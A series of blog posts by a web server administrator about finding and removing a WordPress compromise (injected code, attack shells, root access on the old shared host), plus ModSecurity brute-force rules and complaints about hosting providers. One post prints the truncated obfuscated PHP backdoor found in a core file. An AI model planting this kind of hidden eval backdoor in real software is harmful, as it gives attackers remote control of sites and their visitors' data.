Today’s hour-long educational presentation…

Even if you don’t really speak tech, watch it.  He doesn’t go into really deep detail, though it does require some understanding of how networking works.

If you still don’t want to take the hour, let me synopsize it in one single sentence:

Nothing is safe.

And there isn’t much hope for immediate improvement either, because the NSA is leaning on organizations to leave a lot of this crap in place.  Not to mention they do not report the security holes they find; instead, they want them left open for exploitation.

There are a couple of things that desperately need to change; one of the biggest is that security needs to stop being an afterthought in software and systems development.  I’ve said it before folks, we’re in a cold war and one side just doesn’t want to admit the truth of the matter yet.

Zombies are Real and Infectious…

That is, of course, unless you supply a couple of well-placed rounds to the upper cranial cavity once you discover their plight.

Let me start at the beginning.  Over the past month I’ve been busy polishing the last rough edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to give myself the best odds of survival when the inevitable finally happens.

Last weekend I migrated bloggers Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and hit a few minor oddities, which I quickly resolved.  That done, I set my sights on moving Weer’d.

I logged in, dumped the database, and tar’d up the site.  The tar fails.  Odd, what do you mean you couldn’t read that file?  I didn’t think much of it, found the file, and, odd, the permissions are 000.  This isn’t my site though, and I’m not sure if something special was done, so I fix it.  In total I fix 8 files like this.  I move the site over and get him set up on the new server.  It actually went even more smoothly than Linoge’s and didn’t require a weird step.
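For anyone curious, the move itself was nothing exotic.  A minimal sketch of the process, with hypothetical database names, users, and paths (yours will differ):

# Dump the database and archive the site on the old host
mysqldump -u weerd_user -p weerd_db > weerd_db.sql        # database name and user here are hypothetical
tar -czvf weerd_site.tar.gz -C /home/weerd public_html    # tar complains about any file it can't read

# Spot files with 000 permissions like the ones that tripped up tar
find /home/weerd/public_html -type f -perm 000

# Ship both archives to the new server ("newserver" is a placeholder)
scp weerd_db.sql weerd_site.tar.gz root@newserver:/root/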

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not give me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '66.249.76.207', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '66.249.76.207', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

What!?  I promptly open that file and am greeted by the following:

/**
* Applies custom filter.
*ap
* @since 0.71
*
* $text string to apply the filter
* @return string
*/
function applyfilter($text=null) {
  @ini_set('memory_limit','256M');
  if($text) @ob_start();
  if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl',6274);}call_user_func(create_function(,"\x65\x76\x61l(\x4F01100llO());"));}}
  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}
}

Now, for those who may not realize it, I immediately recognized that odd text as obfuscated code… sitting in the middle of a standard WordPress file.  Das Not Good.  I promptly shifted into DEFCON 2; the good news was that the IP in the log was just Google crawling the site.  I bumped an email to Weer’d, along with everyone else, about this new Charlie Foxtrot.

I have no idea how severe this incident is; at this point I trust absolutely no one.  My first order of business is to close off the hole I can now see, so I manually reinstall WordPress, overwriting ALL the existing core files on the server.  That promptly stops those messages from trailing through my log.
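For reference, a manual core reinstall is roughly this; a sketch assuming shell access and a standard install layout, which deliberately leaves wp-config.php and wp-content alone:

cd /home/weerd                              # hypothetical account path
wget https://wordpress.org/latest.tar.gz    # grab a clean copy of WordPress core
tar -xzf latest.tar.gz                      # unpacks into ./wordpress/
rm -rf wordpress/wp-content                 # don't clobber themes/plugins/uploads in this step
cp -a wordpress/. public_html/              # overwrite every core file in place
rm -rf wordpress latest.tar.gz              # clean up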

Something new happens though.  Weer’d runs the WordFence security plugin (fantastic plugin, and I highly suggest it), so I run a scan, and it says nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff against another site that is known good and discover a pile of files.
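The comparison itself is nothing fancy; something along these lines, with hypothetical paths for the known-good install, limited to the core directories to keep the noise down:

diff -rq /home/goodsite/public_html/wp-includes /home/weerd/public_html/wp-includes   # flags files that differ or exist on only one side
diff -rq /home/goodsite/public_html/wp-admin /home/weerd/public_html/wp-admin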

[Image: the list of files turned up by the diff.]

There’s the list in a slightly more file-friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output:

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double-checking from a shell, and then reinstalling what I actually want to keep, which overall is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  In the end there were both stock WordPress files that had been compromised and additional files that had been added but made to look legitimate.
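These days a quicker way to separate stock files from tampered or planted ones is to check core against the official checksums.  A sketch using WP-CLI, assuming you have it installed (I did not have it handy that night):

wp core verify-checksums --path=/home/weerd/public_html   # flags core files that don't match WordPress.org's published checksums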

After a short while I had the site cleaned up on my server.  I will do a more thorough cleaning, but that was the immediate-action remedy for BF 30 in the am Sunday night.

I do, however, want to investigate the details of this.  I log in to the old server with Dreamhost and start looking around.  I want to isolate the cause of the breach and determine if there are any other issues.  Did this just suddenly go sideways on my box, or was this a preexisting condition, and to what depths did it go?  All the exploits are present on the old server, so the compromise predates the move and wasn’t anything on my side.  And then I look at the root directory:

[Screenshot: the old server’s root directory listing.]

Do you see it?  Here’s the dump of what’s inside:

[Screenshot: a dump of what’s inside.]

Now, if you pay close attention you can glean a few important facts from the above.  First, they had multiple exploits in place to get back in.  Second, they obtained root access on the box.  In hindsight I had noticed a few things (other than the interesting file name that should have been a giant fucking red flag), such as .bash_history not working correctly.  Lastly, we can note the date of the last edit: October 5th, 2012.
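If you want to hunt for the same signs on your own box, a couple of quick checks (a sketch; attackers commonly point .bash_history at /dev/null so their commands vanish):

ls -la ~/.bash_history    # a symlink to /dev/null, or a zero-length file that never grows, is a red flag
stat ~/.bash_history
find ~ -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort | tail -n 40   # most recently modified files under the account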

There’s a reason that date rang a bell with me.  From an article dated Oct 3, 2012:

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as “itsoknoproblembro.” When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friend’s place and inadvertently moved him.  That’s OK though; upon finding him I filled him full of 00 buckshot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire when I get a bit more free time.

My actions, though, are leaps and bounds beyond what Dreamhost is doing, and remember, they’re the ones who actually suffered a data breach and have a server where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
http://wiki.dreamhost.com/My_Wordpress_site_was_hacked
More information on this topic is available at the following URL under the “CGI Hack” and “Cleaning Up” sections:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in root access, and Dreamhost’s response is, “Here, we’ll help you remove the malicious code from your site.”  Uh, already done that, sparky, but the bad news is that’s like closing the barn door after the cow has gotten out.  Or, more specifically, closing and locking the front door after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites under other accounts?

The real reason we were informing you is that you have a breach which placed everyone with data on that server in danger.  If I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you, boy genius.

Yes, I understand you want to look good and not like a complete idiot in front of your customers.  You know what though: “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious, and at least an acknowledgement of “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why they’re happening.  It sucks; every time something goes wrong I think my forehead gets flatter from meeting my desk.  Luckily, at this point I think it’s solved, and today’s was a bit of an odd duck that only affected one site, but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well, I’m sorry, but we have heavy signs of enemy action, and that is no coincidence.  That server is most likely still compromised at the root level, and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks: digital zombies exist, they are contagious if you’re not careful, and they are best dealt with via a serious dose of heavy metal poisoning followed by a tactical nuke to the general vicinity.  Be very careful too; sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done finished and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”


SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event of if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA
http://www.liquidweb.com/about/dedicatedsla.html

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.


Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I²R losses, as always, are a pain in the ass.

0 to Attacked in No Time Flat

So as I’ve mentioned previously, I’ve moved to the world of a VPS, which for all intents and purposes is much like being self-hosted.  I used to do this stuff a long time ago, and I still do it, but not nearly as intensively, and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server set up and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I just set up this server though, who could possibly be attacking it?

[Graph: Bandwidth usage since I turned on the server.]

You can see where I turned the server on on the 13th.  Notice that big spike shortly thereafter; yeah, that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site, since it locked up within minutes, and I had tweaked some server settings and thought that caused the instability.

Come Monday morning I have an email from A Girl saying she cannot get in, and two from the data center saying they rebooted the server after it ran out of memory and locked up.
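When a box falls over like that, the kernel log usually says why.  A couple of standard checks (nothing host-specific about them):

grep -i "out of memory" /var/log/messages    # did the OOM killer fire?
dmesg | grep -iE "oom|killed process"        # which processes got killed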

[Graph: System load and availability since the server was turned on.]

You can’t see it as well in those images, except for the latest incident, but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched my firewall from APF to CSF so I could gain use of LFD (the Login Failure Daemon).  I spent my time installing and configuring it last night.
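If you’ve never made that swap, the CSF install is painless.  A sketch of the standard procedure (remove APF first, and remember to turn off TESTING in /etc/csf/csf.conf once you’re happy with the rules):

cd /usr/src
wget https://download.configserver.com/csf.tgz   # ConfigServer Security & Firewall
tar -xzf csf.tgz
cd csf
sh install.sh                                    # installs csf and lfd, including the WHM plugin on cPanel boxes
# After editing /etc/csf/csf.conf (TESTING = "0", etc.):
csf -r                                           # reload the firewall rules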

[Graph: The proc spike I had overnight.]

[Graph: A more detailed view of the bandwidth spikes.]

There you can see the proc spike from an incident last night.  I did a few more tweaks to CSF, and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discovered that there is a way to have Apache watch all the wp-login pages for failed logins and, when they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach to handling the problem.

If you are a server administrator and want to protect against the WordPress brute force attack, it is quite simple, doubly so if you have WHM.

Log in to WHM and go to Software > EasyApache.  Follow the onscreen instructions and rebuild Apache, making sure the modsec2 (ModSecurity) module is selected.  Build Apache.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

#Block WP logins with no referring URL
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210
<LocationMatch "/wp-login.php">
SecRule REQUEST_METHOD "POST" "deny,status:401,id:5000211,chain,msg:'wp-login request blocked, no referer'"
SecRule &HTTP_REFERER "@eq 0"
</LocationMatch>

#WordPress brute force detection
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212
<LocationMatch "/wp-login.php">
# Set up brute force detection.
# React if the block flag has been set.
SecRule ip:bf_block "@gt 0" "deny,status:401,log,id:5000213,msg:'ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.'"
# Set up tracking. On a successful login, a 302 redirect is performed; a 200 indicates the login failed.
SecRule RESPONSE_STATUS "^302" "phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214"
SecRule RESPONSE_STATUS "^200" "phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215"
SecRule ip:bf_counter "@gt 10" "t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0"
</LocationMatch>

Save the file and restart Apache.  This will help stop the brute force attacks.  If it weren’t for the off chance of false positives, I’d be good with a perma-ban and dropping that axe like a rock…
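On a cPanel box the restart step looks roughly like this; the configtest just keeps a typo in the rules from taking Apache down with it:

apachectl configtest          # make sure the new rules parse
/scripts/restartsrv_httpd     # cPanel's wrapper for restarting Apache
# on a stock box, service httpd restart does the same job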

Funny story: I dropped that !@#$ing axe on myself tonight.  Most of the other services are watched by LFD, and when you rack up multiple login failures, it drops the axe, and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business, tried to log in a couple times with the wrong password, and bam, there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that it sounds like my intrusion detection system works for the TSA.

In the meantime, the folks I got the VPS from (they’ve been fantastic support-wise, unlike that previous host) are trying to figure out what’s causing the load spikes.  The bummer is it happens randomly, so it’s a pain to catch in the act.  The good news is the server has actually survived the past couple of slams, so it’s almost there.  Security-wise it isn’t a concern; it’s just an issue with service.

Too Little Too Late…

So I got the following email at 1630 tonight.  I know the ball started rolling at 0800 this morning thanks to Twitter.  They may have had that many complaints to work through, but here is the email I got.

Dear Barron,

My name is CS Rep and I am writing you from Customer Relation Department. Your case was brought to my attention because you gave us a bad review on Twitter. We are very serious about providing you with an exceptional hosting and customer service experience, we would like to confirm that everything is running as you would like. What would it take for us to became the best hosting provider for you?
Your feedback is crucial for our business to move forward. We are still that strong company with quality and products as we continue to invest more into support and service in terms of training and technology.
Do not hesitate to use my direct line (her number) or 24/7 technical support (their number) or simply reply to this email: [email protected].

Thank you for choosing myhosting.com, I hope we can get your positive tweets shorty.

Sincerely,

CS Rep

My world at work is customer service, so I am always willing to respond so that, if they’re actually willing to improve their service, they can.  Here is my response.

Hi Olga,

Let me start off by saying that at this point I will be leaving myHosting.  I have invested in outside hosting; at best I will retain my myHosting account for Exchange email purposes.  That said, as someone who works for a company that prides itself on customer service, I’m going to lay out the whole situation from beginning to end, along with my perspective on it.

Last month I had regular service issues despite my use of the CloudFlare CDN. I opened ticket #: FNF-528-19240

After multiple back-and-forth arguments about whether or not my site was even hosted with myHosting, they finally just blamed CloudFlare; the problem continued, but with less frequency.  I just dealt with it.  For the most part the site would come back immediately on a refresh, and none of my customers were noticing an issue or reporting one to me.

Then, in the midst of this WordPress attack, I started to have issues a little more frequently.  I started to get emails from my customers, and I did what I could on my end to fix the issue.  Then it happened: I and all my customers, 4 total, were locked out of our sites.  We were locked out without any email in my inbox explaining how to fix the issue.  When the solution did arrive, after my promptly emailing support, it was one that none of my 4 customers could implement themselves, and it wasn’t even feasible for 2 of them.  Despite my efforts in maintaining a secure WordPress site, including plugins to stop the brute force attacks, my site was rendered unusable not just to me, but to my customers.  I actually had to disable CloudFlare, thus increasing my exposure to SPAM and other undesirable traffic.

Just so I am perfectly clear: the actions myHosting took to “secure” the websites for which I am responsible resulted in their inability to function for my customers.  It took me at least 12 hours before I could finally get those sites unlocked for my customers.  During this time my ability to handle issues, as well as my customers’ general perception of me, was degraded.  Doubly so since trying to unlock 2 of the sites resulted in 500 internal server errors.  Once that error was corrected, clean URLs were broken due to other changes myHosting had made to the .htaccess files.  Instead of just correcting their errors in the files, they dumped them.  This made me look like an idiot again when a customer informed me in the morning he was getting 404 errors.

That night I started the migration to a VPS with another company.  I could not trust that myHosting, even in a VPS, would not mess with my files or otherwise cause me issues and heartache.

I will say the shining spot in this entire mess was that it appeared I dealt with one single support representative.  That is ownership, and honestly that is what I like to see.  But here is his last email.  Don’t blame him though; he was trying to keep the peace and convey your position.  It is a lesson in the need to be seriously empathetic to customers and to the effects of your actions as a provider.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict.
Because you appear to have a very secure webspace, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack, so please proceed with caution and make sure all wordpress user passwords are complex and secure.

We have disabled the .htaccess files on those two websites and they appear to be loading currently. If you would like, remove all the added code and turn your cloudflare back on.

Please let it be known we are trying to protect our customers the best possible way. Because of the urgency of the matter, this was the quickest solution. We hope this does not ruin your experience with myhosting.com.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

Here’s how I read it:

Your Text.
My Corrections in Phrasing.
My mental commentary while reading.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. Because evidently the idea someone would be unhappy about being locked out of their own website surprises us.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict decided to treat all our users like idiotic children that know nothing about anything.  Luckily I have experience with being penalized because of the actions of others.

Because you appear to have a very secure webspace actually know what the fuck you’re doing and have previously educated our support staff, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack a brute force attack where they just randomly try passwords, so please proceed with caution and make sure all wordpress user passwords are complex and secure.  Why in the name of god do you think I use keypass and generate 20 character password strings, just for the ease in memorization?

We have disabled the .htaccess files on those two websites and they appear to be loading currently but we broke clean URLs so they’re still not working right, our bad? If you would like, remove all the added code and turn your cloudflare back on.  You mean I can unfuck my websites if I so choose!?  Here I thought you guys were just out to screw me in front of people I support.  And yes I unfucked every one I could as fast as I could, even before I got your permission!

Please let it be known we are trying to protect our customers the best possible way, by nuking the site from orbit by treating our customers like children and blocking their access to their own sites just the same as the attackers. Because of the urgency of the matter, this was the quickest solution, because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin. We hope this does not ruin are sorry this has completely ruined your experience with myhosting.com.  We didn’t consider the ramifications of how our actions could possible make our customers look in the eyes of their own clients.  We will think about possibly not treating all our customers like children in the future but don’t count on it.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

And yes, this did go up on my blog, and this email will be going up as well.  I want you to understand exactly how badly this has cut into me.  I pride myself on customer service, and whenever possible I stop what I’m doing to help when there is an issue, even when these people do not pay me a dime for my services.  I get an email at 0400 in the morning, and if my phone actually wakes me up I will look and go fix the problem.  I take my wife out to dinner, get a text message that the server is down, and spend the rest of dinner cranking away on my phone to fix the problem.  That is customer service: owning the problem and fixing it.  Most definitely you do NOT create problems for the customer, and if you do, you fix them 100% and ensure the site is returned to normal.  You do everything you can for that customer to ensure the problem is fixed immediately and any issues created are taken care of or assisted with to the best of your ability.

You must also remember that when you go and do something like that, it has consequences beyond just your visible customer level.  Your customers have customers.  Some have businesses, and those types of actions cost them money and trust.  In this case myHosting called into question my integrity and my ability to be a provider of website services.  Integrity once lost can never be regained, and I find the actions of myHosting downright deplorable given their impact on me, my business, and my customers.

If you have any other questions feel free to ask.

Sincerely,

Barron Barnett

I’m not holding out for another response back, but I figured I’d give them honest feedback. I will say I was kind of happy to get the kick in the ass to go get a VPS.

If you’re reading this, it is done…

If you are seeing this post, that means you are now staring at my shiny new VPS.

There is a pile of stuff I’m still cleaning up, and I’ve got a pile of sites to move over; this one alone took me about 5 hours to do.  I’m hoping the others go more quickly, but the majority of the time was spent downloading and uploading, with a bit of tweaking files here and there.

In the meantime, if you find something broken or out of place, please let me know so I can get it fixed immediately.

Thanks.

Saying Good-Bye to My Hosting…

I suppose I could lay out the entire email chain that went down yesterday, which actually started Thursday night.

Suffice it to say, for those who aren’t aware, there is currently a brute force attack against any and all WordPress websites.  Overall it is not the most difficult thing to spot; most of the login attempts use the same user name, and overall they’re just not that intelligent.  Evidently my current provider, myHosting, was getting slammed, and quite hard.  In an effort to head the problem off at the pass they edited everyone’s .htaccess files to restrict access to the WordPress login page.  This wouldn’t be a problem except they defaulted to deny, so site owners were locked out.  Most definitely that’s not Shiny.
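For context, the kind of blanket rule they pushed into .htaccess looks something like this.  This is a reconstruction of the idea, not their exact file, and the commented Allow line is a hypothetical example address a site owner could swap for their own IP:

# Deny everyone access to the WordPress login page
<Files wp-login.php>
Order Deny,Allow
Deny from all
# A site owner could re-open it just for themselves:
# Allow from 203.0.113.10
</Files>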

The last email I got in the exchange as I was trying to fix the issues is here, along with additional comments.

Their Text.
Wrong Words My Corrections in Phrasing.
My mental commentary while reading.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. Because evidently the idea someone would be unhappy about being locked out of their own website surprises us.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict decided to treat all our users like idiotic children that know nothing about anything.  Luckily I have experience with being penalized because of the actions of the few.

Because you appear to have a very secure webspace actually know what the fuck you’re doing and have previously educated our support staff, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack a brute force attack where they just randomly try passwords, so please proceed with caution and make sure all wordpress user passwords are complex and secure.  Why in the name of god do you think I use keypass and generate 20 character password strings, just for the ease in memorization?

We have disabled the .htaccess files on those two websites and they appear to be loading currently, but we broke clean URLs so they’re still not working right, our bad? If you would like, remove all the added code and turn your cloudflare back on.  You mean I can unfuck my websites if I so choose!?  Here I thought you guys were just out to screw me in front of people I support.  And yes I unfucked every one I could as fast as I could, even before I got your permission!

Please let it be known we are trying to protect our customers the best possible way, by nuking the site from orbit by treating our customers like children and blocking their access to their own sites just the same as the attackers. Because of the urgency of the matter, this was the quickest solution, because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin. We hope this does not ruin are sorry this has completely ruined your experience with myhosting.com.  We didn’t consider the ramifications of how our actions could possible make our customers look in the eyes of their own clients.  We will think about possibly not treating all our customers like children in the future but don’t count on it.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

That final email just kind of shoved me over the edge into absolutely not wanting to stick around.  Seriously, that’s pretty much how I read it when it came in.  I didn’t discover the .htaccess issue with clean URLs being totaled until this morning when Sean emailed me.

Seriously, +1 to them on ownership in support.  Other than this recent shit storm they’ve been a decent host, but I’m biting the bullet and going to a VPS.  Because of my love for Microsoft Exchange I’ll be getting a separate host for email just for the wife and me, but at this point I’m downloading sites one by one and moving them to the VPS when possible.

This site will be the first to move and will hopefully be done by early in the evening.  I still need to finish securing the VPS and doing other setup work.

Hosting Issues…

For those unaware, there is currently a massive attack on all WordPress sites.  My hosting provider has taken some actions to “help stop the attack.”

